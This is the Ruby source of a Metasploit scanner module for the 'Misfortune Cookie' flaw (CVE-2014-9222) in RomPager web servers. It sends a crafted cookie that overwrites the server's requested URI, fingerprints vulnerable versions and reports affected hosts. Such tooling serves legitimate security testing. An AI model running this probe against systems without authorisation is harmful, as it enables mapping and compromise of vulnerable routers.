## https://sploitus.com/exploit?id=PACKETSTORM:181134
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(
info,
'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Scanner",
'Description' => %q(
This module scans for HTTP servers that appear to be vulnerable to the
'Misfortune Cookie' vulnerability which affects Allegro Software
Rompager versions before 4.34 and can allow attackers to authenticate
to the HTTP service as an administrator without providing valid
credentials.
),
'Author' => [
'Jon Hart <jon_hart[at]rapid7.com>', # metasploit module
'Lior Oppenheim' # CVE-2014-9222
],
'References' => [
['CVE', '2014-9222'],
['URL', 'http://mis.fortunecook.ie'],
['URL', 'http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices
['URL', 'http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC
],
'DisclosureDate' => '2014-12-17',
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('TARGETURI', [true, 'URI to test', '/'])
], Exploit::Remote::HttpClient
)
register_advanced_options(
[
OptString.new('CANARY_URI', [false, 'Try overwriting the requested URI with this canary value (empty for random)']),
OptString.new('STATUS_CODES_REGEX', [true, 'Ensure that canary pages and probe responses have status codes that match this regex', '^40[134]$'])
], self.class
)
end
def check_host(_ip)
begin
test_misfortune
ensure
disconnect
end
end
def run_host(ip)
status = check_host(ip)
case status
when Exploit::CheckCode::Appears
when Exploit::CheckCode::Detected
when Exploit::CheckCode::Vulnerable
print_good("#{peer} #{status.last}")
else
vprint_status("#{peer} #{status.last}")
end
end
def setup
@status_codes_regex = Regexp.new(datastore['STATUS_CODES_REGEX'])
end
# Fingerprints the provided HTTP response and returns
# Exploit::CheckCode::Appears if it is a vulnerable version of RomPager,
# otherwise returns the provided fall-back status.
def check_response_fingerprint(res, fallback_status)
fp = http_fingerprint(response: res)
if /RomPager\/(?<version>[\d\.]+)/ =~ fp
vprint_status("#{peer} is RomPager #{version}")
if Rex::Version.new(version) < Rex::Version.new('4.34')
return Exploit::CheckCode::Appears
end
end
fallback_status
end
def find_canary
vprint_status("#{peer} locating suitable canary URI")
canaries = []
if datastore['CANARY_URI']
canaries << datastore['CANARY_URI']
else
# several random URIs in the hopes that one, generally the first, will be usable
0.upto(4) { canaries << '/' + Rex::Text.rand_text_alpha(16) }
end
canaries.each do |canary|
res = send_request_raw(
'uri' => normalize_uri(canary),
'method' => 'GET',
'headers' => headers
)
# in most cases, the canary URI will not exist and will return a 404, but
# if everything under TARGETURI is protected by auth, a 401 may be OK too.
# but, regardless, respect the configuration set for this module
return [canary, res.code] if res && res.code.to_s =~ @status_codes_regex
end
nil
end
def headers
{
'Referer' => full_uri
}
end
# To test for this vulnerability, we must first find a URI known to return
# a 404 (not found) which we will use as a canary. This URI (for example,
# /foo) is then taken and used as the value for a carefully crafted cookie
# when making a request to the configured host+port+uri. If the response
# is a 404 and the body includes the canary, it is likely that the cookie
# overwrote RomPager's concept of the requested URI, indicating that it is
# vulnerable.
def test_misfortune
# find a usable canary URI (one that returns an acceptable status code already)
if canary = find_canary
canary_value, canary_code = canary
vprint_status("#{peer} found canary URI #{canary_value} with code #{canary_code}")
else
vprint_error("#{peer} Unable to find a suitable canary URI")
return Exploit::CheckCode::Unknown
end
canary_cookie_name = 'C107373883'
canary_cookie = canary_cookie_name + "=#{canary_value};"
# Make a request containing a specific canary cookie name with the value set
# from the suitable canary value found above.
res = send_request_raw(
'uri' => normalize_uri(target_uri.path.to_s),
'method' => 'GET',
'headers' => headers.merge('Cookie' => canary_cookie)
)
unless res
vprint_error("#{full_uri} no response")
return Exploit::CheckCode::Unknown
end
unless res.code.to_s =~ @status_codes_regex
vprint_status("#{full_uri} unexpected HTTP code #{res.code} response")
return check_response_fingerprint(res, Exploit::CheckCode::Detected)
end
unless res.body
vprint_status("#{full_uri} HTTP code #{res.code} had no body")
return check_response_fingerprint(res, Exploit::CheckCode::Detected)
end
# If that canary *value* shows up in the *body*, then there are two possibilities:
#
# 1) If the canary cookie *name* is also in the *body*, it is likely that
# the endpoint is puppeting back our request to some extent and therefore
# it is expected that the canary cookie *value* would also be there.
# return Exploit::CheckCode::Detected
#
# 2) If the canary cookie *name* is *not* in the *body*, return
# Exploit::CheckCode::Vulnerable
if res.body.include?(canary_value)
if res.body.include?(canary_cookie_name)
vprint_status("#{full_uri} HTTP code #{res.code} response contained canary cookie name #{canary_cookie_name}")
return check_response_fingerprint(res, Exploit::CheckCode::Detected)
else
vprint_good("#{full_uri} HTTP code #{res.code} response contained canary cookie value #{canary_value} as URI")
report_vuln(
host: rhost,
port: rport,
name: name,
refs: references
)
return Exploit::CheckCode::Vulnerable
end
end
vprint_status("#{full_uri} HTTP code #{res.code} response did not contain canary cookie value #{canary_value} as URI")
check_response_fingerprint(res, Exploit::CheckCode::Safe)
end
end